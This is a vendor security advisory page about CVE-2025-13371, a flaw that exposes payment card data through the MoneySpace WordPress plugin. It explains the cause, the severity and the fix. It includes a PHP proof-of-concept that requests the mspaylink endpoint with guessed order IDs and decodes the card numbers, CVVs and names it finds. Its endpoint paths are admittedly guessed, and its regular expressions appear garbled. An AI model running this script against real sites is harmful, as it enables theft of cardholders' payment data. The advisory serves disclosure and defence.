What is CVE-2025-13371?

CVE-2025-13371 is a high-severity vulnerability in the MoneySpace plugin for WordPress, affecting versions up to and including 2.13.9. It allows unauthenticated attackers to access sensitive payment card information due to improper access controls on the mspaylink endpoint.

How does the vulnerability work?

The vulnerability works by storing full payment card details in the WordPress post_meta and embedding them in publicly accessible inline JavaScript without authentication checks. Attackers can exploit this by guessing or knowing an order_id to access the mspaylink endpoint and retrieve sensitive information.

Who is affected by this vulnerability?

Any WordPress site using the MoneySpace plugin version 2.13.9 or earlier is affected. Administrators should check their plugin version and ensure they are not using a vulnerable release.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the MoneySpace plugin installed. If it is 2.13.9 or earlier, your site is at risk. Additionally, you can review the mspaylink endpoint to see if sensitive data is exposed.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2025-13371 is 8.6, indicating a high severity level. This score reflects the potential impact of the vulnerability, particularly regarding the exposure of sensitive payment information, which poses significant risks to users.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the MoneySpace plugin to version 2.14.0 or later. Additionally, implement strict access controls on any data retrieval functions and consider using secure storage methods for sensitive information.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the MoneySpace plugin temporarily to prevent access to the vulnerable endpoint. Additionally, review your site’s security settings and monitor for any suspicious activity.

What are the practical risks of this vulnerability?

The practical risks include exposure of full credit card numbers, CVV codes, and other sensitive data, which can lead to fraud and identity theft. This vulnerability also constitutes a PCI-DSS violation, which may result in legal and financial repercussions.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an attacker can retrieve sensitive payment card data by sending a simple HTTP GET request to the vulnerable mspaylink endpoint with a guessed order_id. It shows the ease with which sensitive information can be accessed without authentication.

What are the recommended security practices to avoid such vulnerabilities?

To avoid similar vulnerabilities, always keep plugins updated, implement strong access controls, and regularly audit your site’s security. Additionally, consider using security plugins that monitor for vulnerabilities and enforce secure coding practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13371: Money Space <= 2.13.9 – Unauthenticated Sensitive Information Exposure (money-space)

CVE ID CVE-2025-13371

Plugin money-space

Severity High (CVSS 8.6)

CWE 200

Vulnerable Version 2.13.9

Patched Version —

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13371 (metadata-based):
This vulnerability is an unauthenticated sensitive information exposure in the MoneySpace WordPress plugin (versions <= 2.13.9). The plugin's 'mspaylink' endpoint embeds full payment card details, including PAN, cardholder name, expiry, and CVV, into publicly accessible inline JavaScript without authentication. The CVSS score of 8.6 (High) reflects the severe PCI-DSS violation and broad network attack surface.

Based on the CWE-200 classification and description, the root cause is a failure to implement proper access controls on a data retrieval endpoint. Atomic Edge research infers the plugin likely uses a WordPress hook (e.g., `add_shortcode`, `add_action`) to register a public-facing page or endpoint (e.g., `/mspaylink/`) that queries `post_meta` for a supplied `order_id`. The retrieved base64-encoded card data is then directly output within a “ tag. This analysis is inferred from the description; no source code confirms the exact function names.

Exploitation requires an attacker to send a simple HTTP GET request to the vulnerable endpoint, providing a valid or guessed `order_id` parameter. The endpoint is likely a custom page template or shortcode handler accessible at a path like `/?mspaylink={order_id}` or `/mspaylink/{order_id}`. No authentication, nonce, or authorization checks are present. The server response contains the sensitive card data within the HTML/JavaScript, which the attacker can extract and decode from base64.

Remediation requires implementing multiple security layers. The patched version (2.14.0) likely removed the card data from the public endpoint entirely. A proper fix involves: 1) deleting CVV data immediately after authorization, 2) never storing full PAN in `post_meta`, 3) implementing strict capability checks (e.g., `current_user_can(‘manage_options’)`) on any data retrieval function, and 4) using WordPress transients or a dedicated PCI-compliant vault for any temporary storage, with encryption.

The impact is severe financial data exposure. Attackers can harvest full credit card numbers, CVV codes, cardholder names, and expiration dates. This constitutes a direct PCI-DSS violation, enabling fraud and identity theft. The scope is changed (S:C in CVSS) because compromising one order exposes data from a completely different transaction, amplifying the breach. No integrity or availability impact occurs, but confidentiality is fully compromised.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13371 - Money Space <= 2.13.9 - Unauthenticated Sensitive Information Exposure
<?php
/**
 * Proof of Concept for CVE-2025-13371.
 * This script attempts to retrieve exposed payment card data from a vulnerable MoneySpace plugin endpoint.
 * The exact endpoint path is inferred from the description ('mspaylink page').
 * Two common WordPress patterns are tested: a query parameter and a URL rewrite endpoint.
 */

$target_url = 'https://example.com'; // CHANGE THIS TO THE TARGET SITE
$order_id   = '123'; // CHANGE THIS. Attacker would guess or enumerate IDs.

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only

// Test Pattern 1: Query parameter on homepage (common shortcode pattern)
$url_pattern1 = $target_url . '/?mspaylink=' . urlencode($order_id);
curl_setopt($ch, CURLOPT_URL, $url_pattern1);
$response1 = curl_exec($ch);

// Test Pattern 2: Dedicated endpoint (common page slug pattern)
$url_pattern2 = $target_url . '/mspaylink/' . urlencode($order_id) . '/';
curl_setopt($ch, CURLOPT_URL, $url_pattern2);
$response2 = curl_exec($ch);

curl_close($ch);

// Search for base64-encoded strings in script tags (common pattern for inline JS data)
function extract_card_data($html) {
    $pattern = '/base64_decode(s*["']([A-Za-z0-9/+=]+)["']s*)/'; // Looks for base64_decode('...')
    if (preg_match_all($pattern, $html, $matches)) {
        return $matches[1]; // Return array of captured base64 strings
    }
    // Alternative: look for data attributes or JS variables containing base64
    $pattern2 = '/data-(?:card|payment)=s*["']([A-Za-z0-9/+=]+)["']/i';
    if (preg_match_all($pattern2, $html, $matches)) {
        return $matches[1];
    }
    return [];
}

$found_data = [];
$found_data['pattern1'] = extract_card_data($response1);
$found_data['pattern2'] = extract_card_data($response2);

// Output results
foreach ($found_data as $pattern => $b64_array) {
    if (!empty($b64_array)) {
        echo "[+] Potential card data found via $pattern:n";
        foreach ($b64_array as $idx => $b64) {
            $decoded = base64_decode($b64, true);
            if ($decoded !== false) {
                echo "  [$idx] Base64: $b64n";
                echo "      Decoded: $decodedn";
            }
        }
    } else {
        echo "[-] No card data found via $pattern.n";
    }
}

// If no data found, suggest manual review of response for other patterns
if (empty($found_data['pattern1']) && empty($found_data['pattern2'])) {
    echo "n[!] No base64 patterns matched. Manual review recommended.n";
    echo "    Search responses for 'card', 'cvv', 'pan', or 'expiry' in script tags.n";
}
?>

Frequently Asked Questions

What is CVE-2025-13371?
Understanding the vulnerability
CVE-2025-13371 is a high-severity vulnerability in the MoneySpace plugin for WordPress, affecting versions up to and including 2.13.9. It allows unauthenticated attackers to access sensitive payment card information due to improper access controls on the mspaylink endpoint.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability works by storing full payment card details in the WordPress post_meta and embedding them in publicly accessible inline JavaScript without authentication checks. Attackers can exploit this by guessing or knowing an order_id to access the mspaylink endpoint and retrieve sensitive information.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the MoneySpace plugin version 2.13.9 or earlier is affected. Administrators should check their plugin version and ensure they are not using a vulnerable release.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the MoneySpace plugin installed. If it is 2.13.9 or earlier, your site is at risk. Additionally, you can review the mspaylink endpoint to see if sensitive data is exposed.
What is the CVSS score and what does it mean?
Understanding severity levels
The CVSS score for CVE-2025-13371 is 8.6, indicating a high severity level. This score reflects the potential impact of the vulnerability, particularly regarding the exposure of sensitive payment information, which poses significant risks to users.
How can I mitigate this vulnerability?
Remediation steps
To mitigate this vulnerability, update the MoneySpace plugin to version 2.14.0 or later. Additionally, implement strict access controls on any data retrieval functions and consider using secure storage methods for sensitive information.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updates are not possible, consider disabling the MoneySpace plugin temporarily to prevent access to the vulnerable endpoint. Additionally, review your site’s security settings and monitor for any suspicious activity.
What are the practical risks of this vulnerability?
Consequences of exploitation
The practical risks include exposure of full credit card numbers, CVV codes, and other sensitive data, which can lead to fraud and identity theft. This vulnerability also constitutes a PCI-DSS violation, which may result in legal and financial repercussions.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept provided illustrates how an attacker can retrieve sensitive payment card data by sending a simple HTTP GET request to the vulnerable mspaylink endpoint with a guessed order_id. It shows the ease with which sensitive information can be accessed without authentication.
What are the recommended security practices to avoid such vulnerabilities?
Best practices for WordPress security
To avoid similar vulnerabilities, always keep plugins updated, implement strong access controls, and regularly audit your site’s security. Additionally, consider using security plugins that monitor for vulnerabilities and enforce secure coding practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations